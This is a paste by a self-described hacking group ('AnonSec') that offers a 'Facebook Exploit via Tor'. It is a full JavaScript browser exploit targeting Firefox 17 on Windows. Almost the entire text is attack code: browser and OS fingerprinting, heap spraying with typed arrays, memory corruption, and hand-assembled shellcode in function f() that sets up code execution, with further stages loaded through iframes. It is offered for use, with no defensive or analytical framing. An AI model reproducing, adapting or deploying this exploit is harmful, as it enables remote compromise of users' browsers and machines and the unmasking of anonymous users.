[+] Facebook Exploit via Tor [+]

1. We are...
2. _____ _________
3. / _ \ ____ ____ ____ / _____/ ____ ____
4. / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
5. / | \ | ( <_> ) | \/ \ ___/\ \___
6. \____|__ /___| /\____/|___| /_______ /\___ >\___ >
7. \/ \/ \/ \/ \/ \/
8. //Laughing at your security since 2012*
9. =================================================================================================
10. Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult
11. - Gh05tFr3ak
12. =================================================================================================
13. ********************************
14. Facebook Exploit via Tor Network
15. ********************************
16.  
17. <html>
18. <body>
19. <iframe frameborder=1 border=1 height=400 width=800 id="iframe"> </iframe>
20. </body>
21. </html>
22.  
23. <script>
24.  
25. var var1=0xB0;
26. var var2 = new Array(var1);
27. var var3 = new Array(var1);
28. var var4 = new Array(var1);
29.  
30. var var5=0xFF004;
31. var var6=0x3FC01;
32.  
33. var var7=0x60000000;
34. var var8=0x18000000;
35.  
36.  
37. var var9=1;
38.  
39. var var10 = 0x12000000;
40. var var11 = 0;
41. var var12=0; // set in b() if on Firefox 17, read in df()
42. // exploit will not be attempted unless var12 is set
43.  
44. var var13 =0;
45.  
46. // top entry point, called as onload handler
47. function u()
48. {
49. if( t() == true )
50. {
51. var9 = 1;
52. b();
53. d();
54. c();
55. }else{
56. return ;
57. }
58. }
59.  
60. function t() // only attempt the exploit once per session
61. {
62. // if(typeof sessionStorage.tempStor !="undefined")
63. // return false;
64. sessionStorage.tempStor="";
65. return true;
66. }
67.  
68. function b()
69. {
70. var version = al(); // ensure Firefox on Windows
71. if(version <17)
72. {
73. window.location.href="content_1.html";
74. } // "content_1.html" was never obtained
75. if( version >=17 /* && version <18 */ )
76. var12 = 0xE8;
77. return ;
78. }
79.  
80. function aj(version) // confirm Windows platform
81. {
82. var i = navigator.userAgent.indexOf("Windows NT");
83. if (i != -1)
84. return true;
85. return false;
86. }
87.  
88. function ak() // confirm Firefox browser
89. {
90. var ua = navigator.userAgent;
91. var browser = ua.substring(0, ua.lastIndexOf("/"));
92. browser = browser.substring(browser.lastIndexOf(" ") + 1);
93. if (browser != "Firefox")
94. return -1;
95.  
96. var version = ua.substring(ua.lastIndexOf("/") + 1);
97. version = parseInt(version.substring(0, version.lastIndexOf(".")));
98. return version;
99. }
100.  
101. function al() // get browser version, -1 if not exploitable
102. {
103. version = ak();
104.  
105. if (!aj(version))
106. return -1;
107. return version;
108. }
109.  
110. function d()
111. {
112. for(var j=0;j<var1;j++)
113. {
114. if( j<var1/8 || j==var1-1)
115. {
116. var tabb = new Array(0x1ED00);
117. var4[j]=tabb;
118. for(i=0;i<0x1ED00;i++)
119. {
120. var4[j][i]=0x11559944;
121. }
122. }
123. var2[j]= new ArrayBuffer(var5);
124. }
125. for(var j=0;j<var1;j++)
126. {
127. var3[j]= new Int32Array(var2[j],0,var6);
128. var3[j][0]=0x11336688;
129.  
130. for(var i=1;i<16;i++)
131. {
132. var3[j][0x4000*i] = 0x11446688;
133. }
134.  
135. }
136.  
137. for(var j=0;j<var1;j++)
138. {
139. if(typeof var4[j] !="undefined")
140. {
141. var4[j][0]=0x22556611;
142. }
143. }
144. }
145.  
146. // load the next piece of the exploit
147. function c()
148. {
149. var iframe=document.getElementById("iframe");
150. iframe.src="content_2a.html";
151. }
152.  
153. // functions below here are called from the other iframes
154.  
155. // df() is passed through content_2 and used by content_3
156. // called nowhere else
157. // The exploit is not attempted if this returns zero.
158. // Note that var12 will be zero unless on Firefox 17.
159. // The returned value is used as part of a heap spray in content_3.
160. function df()
161. {
162. if(var12==0)
163. {
164. return 0x00000000;
165. }
166. var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
167.  
168. if( var9 == 1 || var9 == 2)
169. return ( var14 - var12);
170. else
171. return 0x00000000;
172. }
173.  
174. // w() is called from the second time content_2 is loaded
175. function w()
176. {
177. if(var9==1)
178. v();
179. else
180. x();
181. }
182.  
183. function v()
184. {
185. if(k() == -1)
186. {
187. var11 = p();
188. var9 = 2;
189. c();
190. }else{
191. x();
192. }
193. }
194.  
195. // This quickly becomes a huge mess that is obviously depending
196. // on the JS runtime to screw up in some arcane way. Little is
197. // known about the actual exploit, other than some apparent
198. // shellcode in function f(). Here be dragons.
199.  
200. function k()
201. {
202. for(var j=0;j<var1;j++)
203. {
204. if(var2[j].byteLength!=var5)
205. {
206. return j;
207. }
208. }
209. return -1;
210. }
211.  
212. function p()
213. {
214. for(var j=0;j<var1;j++)
215. {
216. for(var i=1;i<16;i++)
217. {
218. if(var3[j][i*0x4000-0x02]==0x01000000)
219. {
220. return -i;
221. }
222. }
223. }
224. return 0;
225. }
226.  
227. function x()
228. {
229.  
230. var var60 = k();
231. if(var60==-1)
232. return ;
233.  
234. var nextvar60 = q(var60);
235. if(nextvar60==-1)
236. return ;
237.  
238. var var61 = o(var60);
239. var var62 = new Int32Array(var2[nextvar60],0,var8);
240. var var58 = n(var62,var61);
241. if(var58==-1)
242. return ;
243.  
244. var var50 = m(var62,var58);
245.  
246. var13 = var10 + 0x00100000 + 0x00010000 * var11;
247. e(var62);
248.  
249. l(var62,var58);
250.  
251. var var64 = var4[var50][0];
252.  
253. ac(var64,var50,var62,var58,var60);
254. }
255.  
256. function q(var60)
257. {
258. var view = new Int32Array(var2[var60],0,0x00040400);
259. view[0x00100000/4-0x02]=var7;
260. if(var2[var60+1].byteLength==var7)
261. return var60+1;
262. return -1;
263. }
264.  
265. function o(var60)
266. {
267. var view = new Int32Array(var2[var60],0,0x00040400);
268.  
269. var var59 = view[0x00100000/4-0x0C];
270. var var57 = var10 + 0x00100000 + 0x00010000 * var11;
271.  
272. return ((var59 - var57)/4);
273. }
274.  
275. function n(view,firstvar58)
276. {
277. var var57 = var10 + 0x00100000 + 0x00010000 * var11;
278. var var58=0;
279. for(var i=0;i<200;i++)
280. {
281. if(view[var58] != 0x11336688)
282. {
283. if(view[var58] == 0x22556611 )
284. return var58;
285. else
286. return -1;
287. }
288. if(var58==0)
289. {
290. var58 = firstvar58;
291. }else{
292. var var59=view[var58-0x0C];
293. var58 = (var59 - var57)/4;
294. }
295. }
296. return -1;
297. }
298.  
299. function m(view,var58)
300. {
301. view[var58]=0x00000000;
302. for(var j=0;j<var1;j++)
303. {
304. if(typeof var4[j] !="undefined")
305. {
306. if(var4[j][0]!=0x22556611)
307. return j;
308. }
309. }
310. return -1
311. }
312.  
313. function e(view)
314. {
315. var i=0;
316. for(i=0;i<0x400;i++)
317. {
318. view[i] = var13+0x1010 ;
319. }
320. view[0x0]=var13+0x1010;
321. view[0x44]=0x0;
322. view[0x45]=0x0;
323. view[0x400-4]=var13+0x1010;
324. view[0x400]=0x00004004;
325. view[0x401]=0x7FFE0300;
326. }
327.  
328. function l(view,var58)
329. {
330. view[var58] = var13 + 0x1030;
331. view[var58+1] = 0xFFFFFF85;
332. }
333.  
334. function ac(var64,var50,var62,var58,var60)
335. {
336. var var15=ah(var64);
337.  
338. f(var15,var62,var58);
339.  
340. y(var50);
341. var var66 = aa(var62,var58+2);
342.  
343. var var67 = i(var66,0x40,var50,var62) ;
344. j(var67,var62);
345.  
346. g(var50,var62);
347. ab(var13+0x1040 ,var62,var58+2);
348.  
349. r(var60)
350. setTimeout(ad,1000);
351. z(var50);
352. }
353.  
354. function ah(var73)
355. {
356. var var74 = var73.substring(0,2);
357. var var70 = var74.charCodeAt(0);
358. var var71 = var74.charCodeAt(1);
359. var var75 = (var71 << 16) + var70;
360. if (var75 == 0)
361. {
362. var var76 = var73.substring(32, 34);
363. var var70 = var76.charCodeAt(0);
364. var var71 = var76.charCodeAt(1);
365. var75 = (var71 << 16) + var70;
366. }
367. var var15 = am(var75);
368. if (var15 == -1)
369. {
370. return;
371. }
372. return var15
373. }
374.  
375. function am(var77)
376. {
377. var var15 = new Array(2);
378. if (var77 % 0x10000 == 0xE510)
379. {
380. var78 = var77 - 0xE510;
381. var15[0] = var78 + 0xE8AE;
382. var15[1] = var78 + 0xD6EE;
383. }
384. else if (var77 % 0x10000 == 0x9A90)
385. {
386. var78 = var77 - 0x69A90;
387. var15[0] = var78 + 0x6A063;
388. var15[1] = var78 + 0x68968;
389. }
390. else if (var77 % 0x10000 == 0x5E70)
391. {
392. var78 = var77 - 0x65E70;
393. var15[0] = var78 + 0x66413;
394. var15[1] = var78 + 0x64D34;
395. }
396. else if (var77 % 0x10000 == 0x35F3)
397. {
398. var78 = var77 - 0x335F3;
399. var15[0] = var78 + 0x4DE13;
400. var15[1] = var78 + 0x49AB8;
401. }
402. else if (var77 % 0x10000 == 0x5CA0)
403. {
404. var78 = var77 - 0x65CA0;
405. var15[0] = var78 + 0x66253;
406. var15[1] = var78 + 0x64B84;
407. }
408. else if (var77 % 0x10000 == 0x5CD0)
409. {
410. var78 = var77 - 0x65CD0;
411. var15[0] = var78 + 0x662A3;
412. var15[1] = var78 + 0x64BA4;
413.  
414. }
415. else if (var77 % 0x10000 == 0x6190)
416. {
417. var78 = var77 - 0x46190;
418. var15[0] = var78 + 0x467D3;
419. var15[1] = var78 + 0x45000;
420.  
421. }
422. else if (var77 % 0x10000 == 0x9CB9)
423. {
424. var78 = var77 - 0x29CB9;
425. var15[0] = var78 + 0x29B83;
426. var15[1] = var78 + 0xFFC8;
427. }
428. else if (var77 % 0x10000 == 0x9CE9)
429. {
430. var78 = var77 - 0x29CE9;
431. var15[0] = var78 + 0x29BB3;
432. var15[1] = var78 + 0xFFD8;
433. }
434. else if (var77 % 0x10000 == 0x70B0)
435. {
436. var78 = var77 - 0x470B0;
437. var15[0] = var78 + 0x47733;
438. var15[1] = var78 + 0x45F18;
439. }
440. else if (var77 % 0x10000 == 0x7090)
441. {
442. var78 = var77 - 0x47090;
443. var15[0] = var78 + 0x476B3;
444. var15[1] = var78 + 0x45F18;
445. }
446. else if (var77 % 0x10000 == 0x9E49)
447. {
448. var78 = var77 - 0x29E49;
449. var15[0] = var78 + 0x29D13;
450. var15[1] = var78 + 0x10028;
451. }
452. else if (var77 % 0x10000 == 0x9E69)
453. {
454. var78 = var77 - 0x29E69;
455. var15[0] = var78 + 0x29D33;
456. var15[1] = var78 + 0x10018;
457. }
458.  
459. else if (var77 % 0x10000 == 0x9EB9)
460. {
461. var78 = var77 - 0x29EB9;
462. var15[0] = var78 + 0x29D83;
463. var15[1] = var78 + 0xFFC8;
464. }
465. else
466. {
467. return -1;
468. }
469.  
470. return var15;
471. }
472.  
473. function f(var15,view,var16)
474. {
475. var magneto = "";
476. var magneto = ("\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"\u4141\u4141"+"");
477. var var29 = magneto;
478. var var17 = "\u9060";
479. var var18 = "\u9061";
480. var var19 = "\uC481\u0000\u0008" ;
481. var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
482. var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
483. var var22 = "\uE589";
484. var var23 ="\uC3C9";
485. var var24 = "\uE889";
486. var24 += "\u608D\u90C0";
487.  
488. var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
489. var var26 = var25 + var16*4
490.  
491. var var27 =""
492. var27 += "\uB890\u2020\u2020";
493. var27 += "\uA390"+ae(var26+0x00);
494. var27 += "\uA390"+ae(var26+0x04);
495. var27 += "\uA390"+ae(var26+0x08);
496. var27 += "\uA390"+ae(var26+0x0C);
497.  
498. var var28 = var17;
499. var28 += var20;
500. var28 += var19;
501. var28 += var22;
502. var28 += var27;
503. var28 += var29;
504. var28 += var21;
505. var28 += var18;
506. var28 += var23;
507. var var29Array = new Array();
508. var29Array=ag(var28);
509.  
510. var var29Ad = var13+0x5010;
511. var i=0;
512. var j=0;
513. var var30=var13+0x4048;
514. var var31 = new Array();
515.  
516. var31[0]=var30;
517. var31[1]=var30;
518. var31[2]=var30;
519. var31[3]=var15[1];
520. var31[4]=var29Ad;
521. var31[5]=0xFFFFFFFF;
522. var31[6]=var13+0x4044;
523. var31[7]=var13+0x4040;
524. var31[8]=0x00000040;
525. var31[9]=var13+0x4048;
526. var31[10]=0x00040000;
527. var31[11]=var29Ad;
528. var31[12]=var13+0x301C;
529.  
530. for(var i=0 ; i < 0x140 ; i++)
531. {
532. var31[i+15]=var15[0];
533. }
534. var var32 = 0x3F8;
535. view[0x800+0+var32]=var13+0x4018;
536. view[0x800+1+var32]=var13+0x4018;
537. for(var i=2 ; i < var31.length ; i++)
538. {
539. view[0x800+i+var32]= 0x41414141;
540. }
541. for(var i=0 ; i < var31.length ; i++)
542. {
543. view[0xC02+i+var32]= var31[i];
544. }
545. for(var i=0 ; i < var29Array.length ; i++)
546. {
547. view[0x1000 + i+var32] = var29Array[i];
548. }
549.  
550. }
551.  
552. function ae(int32)
553. {
554. var var68 = String.fromCharCode((int32)& 0x0000FFFF);
555. var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
556. return var68+var69;
557. }
558.  
559. function af(string)
560. {
561. var var70 = string.charCodeAt(0);
562. var var71 = string.charCodeAt(1);
563. var var72 = (var71 << 16) + var70;
564. return var72;
565. }
566.  
567. function ag(string)
568. {
569. if(string.length%2!=0)
570. string+="\u9090";
571. var intArray= new Array();
572. for(var i=0 ; i*2 < string.length; i++ )
573. intArray[i]=af(string[i*2]+string[i*2+1]);
574. return intArray;
575. }
576.  
577. function y(index)
578. {
579. var4[index][1]= document.createElement('span') ;
580. }
581.  
582. function aa(view,var63)
583. {
584. return view[var63];
585. }
586.  
587. function i(address,size,var50,view)
588. {
589. var var56 = size/2;
590. var56 = var56*0x10 +0x04;
591. view[0x400]=var56;
592. view[0x401]=address;
593. return var4[var50][0];
594. }
595.  
596. function j(memory,view)
597. {
598. var intArray=ag(memory);
599. for(var i=0 ; i < intArray.length ; i++)
600. {
601. view[0x404+i]=intArray[i];
602. }
603. }
604.  
605. function g(var50,view)
606. {
607. var k = h(var50,view);
608. var j=0;
609. if( k < 0 )
610. return -1;
611. view[0x404+k]=var13+0x3010;
612. return 1;
613. }
614.  
615. function h(var50,view)
616. {
617. var address=0;
618. var u=0;
619. var memory="";
620. var var55=0;
621. for( u =7; u >=4 ;u--)
622. {
623. address=view[0x404+u];
624. if( address > 0x000A0000 && address < 0x80000000 )
625. {
626. memory = i(address,0x48,var50,view);
627. var55=af(memory[0x14]+memory[0x15]);
628. if(var55==address)
629. {
630. return u;
631. }
632. }
633. }
634. return -1;
635. }
636.  
637. function ab(address,view,var63)
638. {
639. view[var63]=address;
640. }
641.  
642. function r(var60)
643. {
644. var view = new Int32Array(var2[var60],0,0x00040400);
645. view[0x00100000/4-0x02]=var5;
646. }
647.  
648. function z(index,index2)
649. {
650. var4[index][1].innerHTML;
651. }
652.  
653. // ad() is called through setTimeout
654. function ad()
655. {
656. for(var j=0;j<var1;j++)
657. {
658. delete var3[j]
659. var3[j]= null;
660.  
661. delete var2[j];
662. var2[j] = null;
663.  
664. if(typeof var4[j] !="undefined")
665. {
666. delete var4[j];
667. var4[j] = null;
668. }
669. }
670. delete var2;
671. delete var3;
672. delete var4;
673. var2=null;
674. var3=null;
675. var4=null;
676. }
677.  
678. window.addEventListener("onload", u(),true);
679.  
680. </script>